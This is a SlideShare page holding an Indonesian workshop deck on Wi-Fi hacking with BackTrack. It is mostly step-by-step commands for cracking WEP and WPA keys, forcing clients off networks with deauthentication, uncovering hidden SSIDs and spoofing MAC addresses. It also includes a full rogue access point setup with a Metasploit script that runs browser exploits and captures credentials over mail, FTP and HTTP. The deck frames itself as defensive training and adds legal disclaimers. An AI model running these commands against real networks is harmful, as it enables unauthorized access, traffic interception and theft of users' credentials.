WIRELESS, WEB HACKING&SECURITY SYSTEMWe give you Solution with our eXPerienceIT Training – Software – Hardware – Technical...
About Workshop Wifi HackingMateri ini merupakan kelanjutan dari Seminar “Networking Security” yang dibawakan oleh Pakar IT...
atau Virtual Money semakin diminati dan terus melejit semacam Paypal karena banyak dibutuhkan dalambisnis di internet. Beg...
TAHAPAN WIFI HACKINGTahapan yang harus dilakukan untuk Hacking Wifi adalah sbb :1. AirMonitoring / AirScanning.2. AirCaptu...
hapus dengan perintah "airmon-ng stop ath0"Fungsinya untuk => menghentikan koneksi eksisting dan virtual driver interface ...
Sekarang kita akan buat virtual wifi interface dengan perintah "airmon-ng start wifi0"Fungsinya untuk => menciptakan sebua...
Selanjutnya muncul daftar Wifi Network / BSSID, Power, Mac Address AP / ESSID, Channel yang digunakanmasing2 AP, Bandwith ...
--channel 1 => Channel yang ditampilkan--bssid 00:11:22:33:44:55 => Mac Address dari AP yang ditampilkan-w hasilcap => fil...
#aircrack-ng hasilcap.capFungsinya => untuk menganalisa hasil capture packet dari airdump.
Kita juga bisa melakukan monitoring jaringan wireless ini mengunakan KismetSelanjutnya kita akan melihat Client yang terko...
AIREPLAYbt ~ # aireplay-ngAireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas dOtreppeOriginal work: Christophe Devineht...
source options:-i iface : capture packets from this interface-r file : extract packets from this pcap fileattack modes (Nu...
--fakeauth delay : fake authentication with AP (-1)--interactive : interactive frame selection (-2)--arpreplay : standard ...
Deauthentikasi Aireplay :Fungsinya => Untuk menghentikan koneksi dari Client ke AP sehingga Airdump dapat melakukan captur...
Menyambung ke HotSpotUntuk menyambungkan diri ke HotSpot menggunakan text mode. Langkah yang biasa digunakan1. Scanning fr...
Scanning HotSpotScanning Keberadaan HotSpot dapat dilakukan menggunakan text mode.iwlistCara yang paling sederhana adalah ...
Scanning# airodump-ng mon0
Teknik Menjebol WEP MenggunakanAirodump dan AircrackInformasi dan Pengetahuan yang terkandung pada halaman ini maupunturun...
Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalahmon0. Kita harus menggunakan interface ...
Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkanproses cracking WEP pastikan kita ...
Teknik Menjebol WEPInformasi dan Pengetahuan yang terkandung pada halaman ini maupunturunannya di peruntukan sebagai infor...
Jika berhasil authentikasi, kita dapat membuat packet palsu yang akan kita gunakan untukmemanipulasi traffic paket yang le...
Teknik Menjebol WPAInformasi dan Pengetahuan yang terkandung pada halaman ini maupunturunannya di peruntukan sebagai infor...
Jalankan airodump di WLAN mon0airodump-ng -w hasilcapture --bssid $AP --channel $CHANNEL mon0Versi backtrack 4.0 pre-final...
Dimana :-a MAC AP-c MAC clientKunci dari proses cracking WPA adalah ketersediaan kamus silahkan di cek ke http://www.airc...
Menemukan Hidden SSIDInformasi dan Pengetahuan yang terkandung pada halaman ini maupunturunannya di peruntukan sebagai inf...
Pada Windows yang lain lakukan aireplay asumsinya AP dengan MAC00:11:6B:60:86:91 melalui eth1# aireplay-ng --deauth 1 -a 0...
Teknik Man-in-The-Middle Attack / FakeAPContents 1 Versi Singkat membuat Fake AP 2 Versi lengkap untuk MiTM attack 3 Re...
option domain-name-servers 10.0.0.1;}dhcpd3 -cf /etc/dhcp3/evil-wireless.conf ifconfig mon0mtu 1800ifconfig at0 mtu 1400sv...
load db_sqlite3db_create /root/evilwireless.dbuse auxiliary/server/browser_autopwnsetg AUTOPWN_HOST 10.0.0.1setg AUTOPWN_P...
TARGETHOSTset SRVPORT 53runuse auxiliary/server/capture/http setSRVPORT 80set SSL false runuse auxiliary/server/capture/ht...
set SSL false runuse auxiliary/server/capture/http setSRVPORT 443set SSL true runuse auxiliary/server/capture/http setSRVP...
Teknik Melewati Pembatasan MACAddressInformasi dan Pengetahuan yang terkandung pada halaman ini maupunturunannya di perunt...
# macchanger -mac 00:16:CF:C1:FA:F5 eth1# ifconfig eth1 upatau untuk random MAC address# macchanger -r eth1
Aplikasi Yang Perlu DisiapkanBeberapa paket software yang dibutuhkan :# apt-get install gcc g++ linux-kernel-headers libpc...
-prefix=/usr -sysconfdir=/etc/lorcon -localstatedir=/var -mandir=/usr/share/man-infodir=/usr/share/info# make# make instal...
Instalasi Driver MadWiFiBagi anda yang menggunakan chipset Atheros tampaknya perlu menginstalasi driver MadWiFi.Instalasi ...
WIFI Hacking with Backtrack
WIFI Hacking with Backtrack
WIFI Hacking with Backtrack
Upcoming SlideShare
Loading in …5
×

WIFI Hacking with Backtrack

4,655 views

Published on

WIFI Hacking with Backtrack

Published in: Education, Technology
2 Comments
21 Likes
Statistics
Notes
No Downloads
Views
Total views
4,655
On SlideShare
0
From Embeds
0
Number of Embeds
7
Actions
Shares
0
Downloads
0
Comments
2
Likes
21
Embeds 0
No embeds

No notes for slide

WIFI Hacking with Backtrack

  1. 1. WIRELESS, WEB HACKING&SECURITY SYSTEMWe give you Solution with our eXPerienceIT Training – Software – Hardware – Technical Support – Networking – Server System
  2. 2. About Workshop Wifi HackingMateri ini merupakan kelanjutan dari Seminar “Networking Security” yang dibawakan oleh Pakar IT NasionalBpk Onno. W. Purbo di Universitas Airlangga tanggal 29 November 2009. Materi Wifi Hacking ini sebagaiWorkshop dari Demo yang dibawakan dalam Seminar tersebut.Workshop atau Pelatihan Hacking bertujuan untuk mempelajari dan mendalami serta mempaktekkan SystemKerja atau Teknik Kerja seorang Hacker dalam menemukan celah keamanan atau Hole security suatu jaringanwireless milik orang lain. Pengetahuan dan wawasan tentang Wifi Hacking ini diharapkan dapat menjadipengetahuan peserta workshop sehingga mampu menutup celah keamanan yang dapat diterobos oleh hackeratau oleh orang lain sehingga Wireless Network atau Jaringan kerja yang dibangunnya betul – betul jaringanyang kuat proteksi keamanannya.Simplenya adalah cara menjadi seorang polisi yang handal tentu harus memahami berbagai teknik kejahatanyang dilakukan oleh penjahat yang handal. Sehingga mampu memberikan perlindungan dan menjagakeamanan serta mampu meng-identifikasikan + menangkal + menangkap penjahat tersebut.Dalam Workshop ini di focuskan pada pengunaan Linux BackTrack, baik BackTrack versi 4 maupunBackTrack versi 3 Bootable USB Flashdisk. BackTrack @ Flasdisk sangat simple dan praktis sehingga dapatdigunakan setiap saat tanpa menganggu OS Laptop yang kita gunakan.About Internet & Websites HackingMateri Workshop Hacking ini sebagai preview adanya berbagai celah keamanan yang memungkinkan sebuahwebsites dapat di ambil alih oleh orang lain dengan SQL Injection yang memanfaatkan paramater dariDatabase SQL sehingga hacker dapat memperoleh Username + Password ADMIN atau meng-“inject”Username + Password yang dapat menguasai websites tersebut.Carding dan SQL Injection Database HackingeCommerce yang semakin berkembang dalam transaksi perdagangan via internet yang menjadikan eMoney
  3. 3. atau Virtual Money semakin diminati dan terus melejit semacam Paypal karena banyak dibutuhkan dalambisnis di internet. Begitu juga transaksi mengunakan Kartu Kredit yang memungkinkan adanya celah keamanandalam eCommerce sehingga para pemain bisnis internet harus lebih waspada. Hal inilah yang mengharuskansetiap orang memahami adanya berbagai Teknik Carding maupun SQL Injection terhadap data transaksisehingga dapat merugikan pihak lain.Joomla HackingJoomla Click Jacking adalah berbagai Trik yang memungkinkan menjadi hole dari websites yang dibangundengan Websites Joomla CMS sehingga berbagai hal yang dapat menembus Administrator Joomla.Membuat BackTrack Bootable USB FDCara membuat Bootable USB FD sangat lah mudah.1. Buka File ISO BackTrack USB dengan MagicISO atau PowerISO.2. Copy-kan semua file dari ISO tersebut ke sebuah Flashdisk 1 GB Format yang telah di format.3. Keluar dari program MagicISO atau PowerISO lalu buka flashdisk tersebut dengan Windows Explorer.4. Jalankan file “BOOTINST.BAT”, dan setelah selesai maka Bootable Flashdisk siap digunakan.
  4. 4. TAHAPAN WIFI HACKINGTahapan yang harus dilakukan untuk Hacking Wifi adalah sbb :1. AirMonitoring / AirScanning.2. AirCapturing / AiroDump.3. AirCracking.4. AirConnecting.5. AddOn : Mac Clonning.Pertama kita cek dulu status driver wifi kita dengan perintah "airmon-ng"Fungsinya untuk => cek wifi device & driverTerlihat driver wireless adapter kita sebagai wifi0. Selanjutnya kita jika ada interface lain seperti ath0, kita
  5. 5. hapus dengan perintah "airmon-ng stop ath0"Fungsinya untuk => menghentikan koneksi eksisting dan virtual driver interface wifi ath0Selanjutnya kita cek lagi driver wifi yang masih eksis dengan perintah "airmon-ng"
  6. 6. Sekarang kita akan buat virtual wifi interface dengan perintah "airmon-ng start wifi0"Fungsinya untuk => menciptakan sebuah virtual wifi interface dari wireless interface wifi0Nah setelah tercipta virtual wifi interface dengan nama ath0, maka selanjutnya kita akan melakukan scanningwifi network yang ada disekitar kita dengan perintah "airodump-ng ath0"Fungsinya untuk => perintah untuk melakukan scanning wifi network yg ada disekitar kita.
  7. 7. Selanjutnya muncul daftar Wifi Network / BSSID, Power, Mac Address AP / ESSID, Channel yang digunakanmasing2 AP, Bandwith Speed, Jenis Enkripsi (WEP, OPN, WPA, WPA2), Jenis Authentikasi (PSK, TKIP),Nama Wifi Network / ESSID.=> Serta muncul muncul Mac Address ESSID dan Mac Address Station / Client yg sedang Connect#airodump-ng ath0CH 7 ] [ Elapsed: 16 s ] [ 2009-12-01 18:31BSSIDPWRBeacons #Data, #/s CH MB ENC CIPHER AUTH ESSID00:1E:E5:99:E1:3E 47 5 0 0 13 54.WPA2CCMPPSK BhiNetwork-Linksys-IT00:1A:70:95:AB:1A 19 25 0 0 6 54. WPA TKIP PSK BhiNetwork-Linksys00:C0:02:FF:F1:AC 59 34 18 0 1 11 WEP WEP FREE-HOTSPOTBSSIDSTATION PWR Rate Lost Packets Probes00:C0:02:FF:F1:AC00:1D:0F:BA:DA:2D 54 0-11 0 1 FREE-HOTSPOT=> perintah ini untuk melakukan proses scanning wifi network channel 1 / airodump serta mencatat semuapaket data di channel 1 tsb.#airodump-ng --channel 1 --bssid 00:11:22:33:44:55 -w hasilcap ath0
  8. 8. --channel 1 => Channel yang ditampilkan--bssid 00:11:22:33:44:55 => Mac Address dari AP yang ditampilkan-w hasilcap => file output dari hasil scanningath0 => virtual wifi interface--ivs => format penyimpanan hasil capture sebagai file ivs
  9. 9. #aircrack-ng hasilcap.capFungsinya => untuk menganalisa hasil capture packet dari airdump.
  10. 10. Kita juga bisa melakukan monitoring jaringan wireless ini mengunakan KismetSelanjutnya kita akan melihat Client yang terkoneksi ke Access Point ini :Tekan spaceS - untuk men-sortS - untuk men-sort terhadap SSIDTekan Panah Bawah - Letakan di SSID AP yang kita inginkan.ENTER - detail APC - lihat siapa saja client AP tersebutSelanjutnya akan terlihat daftar Client seperti dibawah ini :
  11. 11. AIREPLAYbt ~ # aireplay-ngAireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas dOtreppeOriginal work: Christophe Devinehttp://www.aircrack-ng.orgusage: aireplay-ng <options> <replay interface>Filter options:-b bssid : MAC address, Access Point-d dmac : MAC address, Destination-s smac: MAC address,Source-m len : minimum packet length-n len : maximum packet length-u type : frame control, type field-v subt : frame control, subtype field-t tods : frame control, To DS bit-f fromds : frame control, From DS bit-w iswep : frame control, WEP bit-D : disable AP detectionReplay options:-x nbpps : number of packets per second-p fctrl : set frame control word (hex)-a bssid : set Access Point MAC address-c dmac : set Destination MAC address-h smac : set Source MAC address-g value : change ring buffer size (default: 8)-F : choose first matching packetFakeauth attack options:-e essid : set target AP SSID-o npckts : number of packets per burst (0=auto, default: 1)-q sec : seconds between keep-alives-y prga : keystream for shared key authArp Replay attack options:-j : inject FromDS packetsFragmentation attack options:-k IP : set destination IP in fragments-l IP : set source IP in fragmentsTest attack options:-B : activates the bitrate test
  12. 12. source options:-i iface : capture packets from this interface-r file : extract packets from this pcap fileattack modes (Numbers can still be used):--deauth count : deauthenticate 1 or all stations (-0)
  13. 13. --fakeauth delay : fake authentication with AP (-1)--interactive : interactive frame selection (-2)--arpreplay : standard ARP-request replay (-3)--chopchop : decrypt/chopchop WEP packet (-4)--fragment : generates valid keystream (-5)--caffe-latte : query a client for new IVs (-6)--cfrag : fragments against a client (-7)--test : tests injection and quality (-9)--help : Displays this usage screen#############aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 01:12:23:34:45:56 ath0-b => MAC AP / BSSID-h => MAC Source / MAC Wifi kita-c / -d => MAC Client / Destinationath0 => virtual wifi interfaceFungsinya => Untuk mempercepat proses pengiriman packet data dari Client ke AP
  14. 14. Deauthentikasi Aireplay :Fungsinya => Untuk menghentikan koneksi dari Client ke AP sehingga Airdump dapat melakukan capture darikoneksi awal dari Client ke AP.=> (Serangan utk Disconnect & Reconnect koneksi suatu client ke AP)#aireplay-ng --deauth 10 -a 00:80:48:7E:CC:57 -c 02:19:FC:01:00:C4 ath010 => jumlah deauthentikasi / penyerangan yang akan dilakukan -a =>MAC AP-c => MAC Client / WorkstationMenganti Mac Address InterfaceWifi : bt ~ # macchanger -A wifi0Current MAC: a2:9b:5c:b2:de:70 (unknown)Faked MAC: 00:e0:06:6f:d4:da (Silicon Integrated Sys. Corp.)bt ~ # macchanger -s wifi0Current MAC: 00:e0:06:6f:d4:da (Silicon Integrated Sys. Corp.)bt ~ # macchanger -m 00:21:63:ad:7c:3a wifi0Current MAC: 00:21:63:ad:7c:3b (unknown)Faked MAC: 00:21:63:ad:7c:3a (unknown)
  15. 15. Menyambung ke HotSpotUntuk menyambungkan diri ke HotSpot menggunakan text mode. Langkah yang biasa digunakan1. Scanning frekuensi# iwlist scanning2. Set ESSID interface wireless (misalnya eth1) agar sama dengan HotSpot# iwconfig eth1 essid HotSpotSSID3. Cek apakah sudah tersambung# iwconfig eth14. Minta IP address ke DHCP Server# dhclient eth1Beberapa Cara untuk Cek Sambungan1. Cek apakah routing ke Internet sudah di berikan oleh DHCP Server. Perhatikan IPgateway untuk tujuan 0.0.0.0 apakah sudah di berikan, menggunakan perintah,# netstat -nr2. Ping ke gateway HotSpot# ping <ip-gateway>
  16. 16. Scanning HotSpotScanning Keberadaan HotSpot dapat dilakukan menggunakan text mode.iwlistCara yang paling sederhana adalah menggunakan perintah# iwlist scanningKismetcara yang lebih rumit menggunakan kismet# apt-get install kismet# vi /etc/kismet/kismet.confsource=none,none,addme --> source=ipw3945,wlan0,ipwsourcesource=none,none,addme --> source=zd1211,eth1,zysourcesource=none,none,addme --> source=ath5k, ath0, athsourceBaca http://www.kismetwireless.net/documentation.shtml untuk melihat source yang dikenali Kismet# kismetairodumpMematikan mode monitor di WLAN interface# airmon-ng stop wlan0Mengaktifkan mode monitor di WLAN interface# airmon-ng start wlan0 1Akan keluar kira-kiraInterface Chipset Driverwlan0 Intel 3945ABG iwl3945 - [phy0](monitor mode enabled on mon2)mon0 Intel 3945ABG iwl3945 - [phy0]mon1 Intel 3945ABG iwl3945 - [phy0]
  17. 17. Scanning# airodump-ng mon0
  18. 18. Teknik Menjebol WEP MenggunakanAirodump dan AircrackInformasi dan Pengetahuan yang terkandung pada halaman ini maupunturunannya di peruntukan sebagai informasi pembelajaran semata.Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatanmaupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luartanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparatpenegak hukum.Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknikberikut ini membutuhkan traffic paket yang sangat besar, biasanya akan mudah dilakukanjika ada yang sedang melakukan transfer file di jaringan HotSpot. Jika tidak ada trafficsama sekali, sampai kapanpun akan susah untuk di crack WEP-nya. Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MACaddress WLAN kita, dan (3) Channel yang digunakan AP.Misalnya,BSSID 00:30:4F:4E:2B:50WIFI 00:11:6b:33:d3:90CHANNEL 2Untuk memudahkan operasi ada baiknya melakukan di shellexport AP=00:30:4F:4E:2B:50 exportWIFI=00:11:6b:33:d3:90 exportCHANNEL=1Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintahairmon-ng start wlan0 1Biasanya akan tampil kira-kira sebagai berikutInterface Chipset Driverwlan0 Intel 3945ABG iwl3945 - [phy0](monitor mode enabled on mon0)
  19. 19. Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalahmon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.Jalankan airodump di WLAN mon0airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0Versi backtrack 4.0 pre-final ternyata harus menggunakan perintahairodump-ng --output-format ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..
  20. 20. Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkanproses cracking WEP pastikan kita dapat menangkap lebih dari 5000 paket.Jalankan aircrack untuk mengcrack WEP# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivsmisalnya# aircrack-ng -a 1 -e linksys -n 64 hasilcapture-01.ivs# aircrack-ng -a 1 -e $AP -n 64 hasilcapture-01.ivsBisa juga menggunakan perintah# aircrack-ng -a 1 -n 64 hasilcapture-01.ivsSwitch -a 1 digunakan untuk menset aircrack-ng agar meng-crack WEPAnda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jikaada yang sedang transfer file di jaringan HotSpot.
  21. 21. Teknik Menjebol WEPInformasi dan Pengetahuan yang terkandung pada halaman ini maupunturunannya di peruntukan sebagai informasi pembelajaran semata.Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatanmaupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luartanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparatpenegak hukum.Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MACaddress WLAN kita, dan (3) Channel yang digunakan AP.Misalnya,BSSID 00:30:4F:4E:2B:50WIFI 00:11:6b:33:d3:90CHANNEL 2Untuk memudahkan operasi ada baiknya melakukan# export AP=00:30:4F:4E:2B:50# export WIFI=00:11:6b:33:d3:90# export CHANNEL=1Teknik mencari data BSSID & CHANNEL di atas menggunakan perintah, misalnya, cardWLAN di eth1. Pastikan bahwa eth1 berada pada mode monitor# iwconfig eth1 mode monitor# iwconfig eth1# airmon-ng start eth1# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1Teknik selanjutnya membutuhkan kemampuan untuk berasosiasi dengan Access Point, sayangnyabiasanya sukar untuk dapat berasosiasi dengan Access Point yang terenkripsi. Jika ada bug di AccessPoint, kita bisa lakukan fake authentication seolah-olah kita telah bergabung ke Access Point tersebut# aireplay-ng -1 0 -e ssidaccesspoint -a $AP -h $WIFI eth1
  22. 22. Jika berhasil authentikasi, kita dapat membuat packet palsu yang akan kita gunakan untukmemanipulasi traffic paket yang lewat dari / menuju access point. Perintah yang digunakan adalah# aireplay-ng -5 -b $AP -h $WIFI eth1Setelah kita cukup banyak berhasil menangkap paket. Proses cracking WEP dapatdilakukan menggunakan# aircrack-ng -a 1 -n 64 hasilcapture.ivs
  23. 23. Teknik Menjebol WPAInformasi dan Pengetahuan yang terkandung pada halaman ini maupunturunannya di peruntukan sebagai informasi pembelajaran semata.Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatanmaupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luartanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparatpenegak hukum.Menjebol WPA hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa mencobalangkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-nya. Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MACaddress WLAN kita, dan (3) Channel yang digunakan AP.Misalnya,BSSID 00:30:4F:4E:2B:50WIFI 00:11:6b:33:d3:90CHANNEL 2Untuk memudahkan operasi ada baiknya melakukan di shellexport AP=00:30:4F:4E:2B:50 exportWIFI=00:11:6b:33:d3:90 exportCHANNEL=1Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintahairmon-ng start wlan0 1Biasanya akan tampil kira-kira sebagai berikutInterface Chipset Driverwlan0 Intel 3945ABG iwl3945 - [phy0](monitor mode enabled on mon0)Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalahmon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.
  24. 24. Jalankan airodump di WLAN mon0airodump-ng -w hasilcapture --bssid $AP --channel $CHANNEL mon0Versi backtrack 4.0 pre-final ternyata harus menggunakan perintahairodump-ng --output-format pcap -w hasilcapture --bssid $AP --channel $CHANNEL mon0Pastikan menggunakan switch --bssid ini akan mempercepat prosescracking :) .. Untuk mempercepat proses gunakan aireplay-ngaireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
  25. 25. Dimana :-a MAC AP-c MAC clientKunci dari proses cracking WPA adalah ketersediaan kamus silahkan di cek ke http://www.aircrack-ng.org/doku.php?id=faq http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlistsDalam contoh paket hasil monitoring akan di simpan di file hasilcapture.Jalankan aircrack untuk meng-crack WPA# aircrack-ng -w kamuspass.txt -b 00:14:6C:7E:40:80 psk*.cap -b MAC BSSIDVersi yang lebih panjang# aircrack-ng -a 2 -e essidapyangakandicrack -n 64 hasilcapture* -w kamuspass.txt# aircrack-ng -a 2 -e linksys -n 64 hasilcapture* -w kamuspass.txt# aircrack-ng -a 2 -e $AP -n 64 hasilcapture* -w kamuspass.txtBisa juga menggunakan perintah# aircrack-ng -a 2 -n 64 hasilcapture* -w kamuspass.txtSwitch -a 2 digunakan untuk menset aircrack-ng agar meng-crack WPA
  26. 26. Menemukan Hidden SSIDInformasi dan Pengetahuan yang terkandung pada halaman ini maupunturunannya di peruntukan sebagai informasi pembelajaran semata.Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatanmaupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luartanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparatpenegak hukum.Cara yang paling ampuh untuk menemukan Hidden SSID adalah menggunakan kismet# kismetHidden SSID akan berwarna biru dan di tutup oleh tanda <> seperti tampak pada gambar.tampilan kismet, warna biru adalah Hidden SSIDBagi anda yang cukup beruntung dapat juga menggunakan cara di bawah ini. Tapikemungkinan gagal lumayan tinggi.Pertama, scanning frekuensi pada WLAN di eth1# airmon-ng stop eth1# airmon-ng start eth1# airodump-ng eth1Jalankan airodump-ng terus menerus di sebuah Windows.
  27. 27. Pada Windows yang lain lakukan aireplay asumsinya AP dengan MAC00:11:6B:60:86:91 melalui eth1# aireplay-ng --deauth 1 -a 00:11:6B:60:86:91 eth1Nanti akan keluar BSSID di airodump-nghttp://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hacking
  28. 28. Teknik Man-in-The-Middle Attack / FakeAPContents 1 Versi Singkat membuat Fake AP 2 Versi lengkap untuk MiTM attack 3 Referensi 4 Pranala MenarikVersi Singkat membuat Fake APairbase-ng -e "Free WiFi" -P -C 30 -v wlan0Versi lengkap untuk MiTM attackSiapkan software yang di butuhkansudo apt-get install subversionSummary perintah yang digunakansvn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng cd aircrack-ng/makemake installsudo su -airmon-ng start wlan0airbase-ng -e "Evil Wireless" -v mon0 & ifconfig at010.0.0.1 netmask 255.255.255.0 apt-get install dhcp3-servervi /etc/dhcp3/evil-wireless.conf option domain-name-servers 10.0.0.1;default-lease-time 60; max-lease-time 72;ddns-update-style none;authoritative;log-facility local7;subnet 10.0.0.0 netmask 255.255.255.0 { range10.0.0.100 10.0.0.254;option routers 10.0.0.1;
  29. 29. option domain-name-servers 10.0.0.1;}dhcpd3 -cf /etc/dhcp3/evil-wireless.conf ifconfig mon0mtu 1800ifconfig at0 mtu 1400svn co http://metasploit.com/svn/framework3/trunk msf3(butuh waktu lama & bandwidth)Menggunakan gems rupanya rewel & belum stabil :( ..apt-get install rubygemsgem install activerecord sqlite3-ruby (butuh waktu lama & bandwidth) vi evilwireless.rc
  30. 30. load db_sqlite3db_create /root/evilwireless.dbuse auxiliary/server/browser_autopwnsetg AUTOPWN_HOST 10.0.0.1setg AUTOPWN_PORT 55550 setgAUTOPWN_URI /adsset LHOST 10.0.0.1 setLPORT 45000 setSRVPORT 55550 setURIPATH /adsrunuse auxiliary/server/capture/pop3 setSRVPORT 110set SSL false runuse auxiliary/server/capture/pop3 setSRVPORT 995set SSL true runuse auxiliary/server/capture/ftp runuse auxiliary/server/capture/imap set SSL falseset SRVPORT 143runuse auxiliary/server/capture/imap set SSL trueset SRVPORT 993runuse auxiliary/server/capture/smtp set SSL falseset SRVPORT 25runuse auxiliary/server/capture/smtp set SSL trueset SRVPORT 465runuse auxiliary/server/fakedns unsetTARGETHOSTset SRVPORT 5353runuse auxiliary/server/fakedns unset
  31. 31. TARGETHOSTset SRVPORT 53runuse auxiliary/server/capture/http setSRVPORT 80set SSL false runuse auxiliary/server/capture/http setSRVPORT 8080
  32. 32. set SSL false runuse auxiliary/server/capture/http setSRVPORT 443set SSL true runuse auxiliary/server/capture/http setSRVPORT 8443set SSL true run./msfconsole -r evilwireless.rcReferensihttp://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-tutorial.htmlhttp://0x80.org/blog/?p=131 - The Evil Access Pointhttp://forums.remote-exploit.org/wireless/23886-tutorial-how-create-fake-ap-auto-bash-script.html- How to create Face APhttp://ww2.mastaputa.com:9999/?p=29http://fix-vista.com/windows-vista-installation-setup/fishing-windows-clients-with-airbase-ng-and-airchat
  33. 33. Teknik Melewati Pembatasan MACAddressInformasi dan Pengetahuan yang terkandung pada halaman ini maupunturunannya di peruntukan sebagai informasi pembelajaran semata.Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatanmaupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luartanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparatpenegak hukum.Sebagian AP akan memfilter MAC address client. Teknik menemukan MAC addressclient yang di ijinkan lewat oleh AP menggunakan Kismet adalah# kismetLakukanspaceS - untuk men-sortS - untuk men-sort terhadap SSIDPanah Bawah - Letakan di SSID AP yang kita inginkan.ENTER - detail APC - lihat siapa saja client AP tersebutPastikan airmon tidak aktif di WLAN eth1# airmon-ng stop eth1Untuk mengubah MAC address dari WLAN di eth1 menjadi sama dengan MAC addressclient yang diijinkan AP# ifconfig eth1 down# ifconfig eth1 hw ether 00:16:CF:C1:FA:F5# ifconfig eth1 upAlternatif lain# ifconfig eth1 down
  34. 34. # macchanger -mac 00:16:CF:C1:FA:F5 eth1# ifconfig eth1 upatau untuk random MAC address# macchanger -r eth1
  35. 35. Aplikasi Yang Perlu DisiapkanBeberapa paket software yang dibutuhkan :# apt-get install gcc g++ linux-kernel-headers libpcap0.8 libpcap0.8-dev libnet1 libnet1-dev libdnet libdnet-dev subversion python2.4 python2.4-dev python-pyx python-crypto python-psyco dhcp3-serverbind9 apache2Install beberapa aplikasi yang lebih fokus untuk hacking wireless# apt-get install kismet scapy macchanger ettercap dsniff aircrack-ngPada Ubuntu 9.04 aplikasi yang di instalasi adalah# apt-get install kismet python-scapy macchanger ettercap dsniff aircrack-ngDownload source code aplikasi berikut jika diperlukan# cd /usr/local/src# svn co https://802.11ninja.net/svn/lorcon/trunk lorcon# wget http://download.aircrack-ng.org/aircrack-ng-0.9.3.tar.gz# wget http://sid.rstack.org/code/wifitap/wifitap-0.4.0.tgz# wget http://easynews.dl.sourceforge.net/sourceforge/airpwn/airpwn-1.30.tgzBagi pengguna Atheros & RT73 perlu mendownload# wget http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r2277-20070414.tar.gz# wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-1.6.1.tar.bz2# wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-1.1.0.tar.bz2Compile & Install Lorcon# cd /usr/local/src/lorcon/# ./configure -prefix=/usr -sysconfdir=/etc/lorcon -localstatedir=/var -mandir=/usr/share/man-infodir=/usr/share/info# make# make installSebaiknya di lakukan melalui airpwn seperti di bawah ini, Compile & Install Airpwn# cd /usr/local/src/# tar zxvf airpwn-1.3.tgz# cd /usr/local/src/airpwn-1.3# tar zxvf lorcon-current.tgz# cp -Rf /usr/local/src/lorcon/* /usr/local/src/airpwn-1.3/lorcon# cd /usr/local/src/airpwn-1.3/lorcon# ./configure
  36. 36. -prefix=/usr -sysconfdir=/etc/lorcon -localstatedir=/var -mandir=/usr/share/man-infodir=/usr/share/info# make# make installLangkah selanjutnya kita perlu menginstall source code kernel:( ...# cd /usr/local/src/airpwn-1.3# ./configure# make# make installInstall Wifitap & Airsnarf# cd /usr/local/src/# tar zxvf wifitap-0.4.0.tgz
  37. 37. Instalasi Driver MadWiFiBagi anda yang menggunakan chipset Atheros tampaknya perlu menginstalasi driver MadWiFi.Instalasi kebutuhan untuk compile# apt-get install build-essential perlDownload source code madwifi darihttp://ath5k.org/wiki/MadWifihttp://sourceforge.net/project/showfiles.php?group_id=82936Copy dan buka source code# cp madwifi-0.9.4.tar.gz /usr/local/src/# cd /usr/local/src# tar zxvf madwifi-0.9.4.tar.gz# cd /usr/local/src/madwifi-0.9.4Compile & Install MadWifi Driver# make# make installLoad module# modprobe ath_pciSource :http://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hacking(CL) Onno W. Purbo

×